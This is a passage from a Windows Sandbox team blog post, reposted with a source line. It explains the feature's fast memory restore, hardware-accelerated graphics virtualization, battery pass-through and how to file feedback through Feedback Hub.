When we need a new instance of Windows Sandbox, we can then restore the sandbox environment from disk into memory rather than booting it. This significantly improves the start time of Windows Sandbox.

Graphics virtualization

Hardware-accelerated rendering is key to a smooth and responsive user experience, especially for graphics-intense or media-heavy use cases. However, virtual machines are isolated from their hosts and unable to access advanced devices like GPUs. The role of graphics virtualization technologies, therefore, is to bridge this gap and provide hardware acceleration in virtualized environments, e.g. Microsoft RemoteFX. More recently, Microsoft has worked with our graphics ecosystem partners to integrate modern graphics virtualization capabilities directly into DirectX and WDDM, the driver model used by display drivers on Windows.

At a high level, this form of graphics virtualization works as follows:

Apps running in a Hyper-V VM use graphics APIs as normal.
Graphics components in the VM, which have been enlightened to support virtualization, coordinate across the VM boundary with the host to execute graphics workloads.
The host allocates and schedules graphics resources among apps in the VM alongside the apps running natively. Conceptually they behave as one pool of graphics clients.

This enables the Windows Sandbox VM to benefit from hardware-accelerated rendering, with Windows dynamically allocating graphics resources where they are needed across the host and guest. The result is improved performance and responsiveness for apps running in Windows Sandbox, as well as improved battery life for graphics-heavy use cases. To take advantage of these benefits, you'll need a system with a compatible GPU and graphics drivers (WDDM 2.5 or newer). Incompatible systems will render apps in Windows Sandbox with Microsoft's CPU-based rendering technology.

Battery pass-through

Windows Sandbox is also aware of the host's battery state, which allows it to optimize power consumption. This is critical for a technology that will be used on laptops, where not wasting battery is important to the user.

Filing bugs and suggestions

As with any new technology, there may be bugs. Please file them so that we can continually improve this feature. File bugs and suggestions at Windows Sandbox's Feedback Hub (select Add new feedback), or follow these steps:

Open the Feedback Hub.
Select Report a problem or Suggest a feature.
Fill in the Summarize your feedback and Explain in more details boxes with a detailed description of the issue or suggestion.
Select an appropriate category and subcategory by using the dropdown menus. There is a dedicated option in Feedback Hub for "Windows Sandbox" bugs and feedback, located under "Security and Privacy", subcategory "Windows Sandbox".
Select Next.
If necessary, collect traces for the issue: select the Recreate my problem tile, then select Start capture, reproduce the issue, and then select Stop capture.
Attach any relevant screenshots or files for the problem.
Submit.

Conclusion

We look forward to you using this feature and receiving your feedback!

Cheers,
Hari Pulapaka, Margarit Chenchev, Erick Smith, & Paul Bozzay (Windows Sandbox team)

Sursa: https://techcommunity.microsoft.com/t5/Windows-Kernel-Internals/Windows-Sandbox/ba-p/301849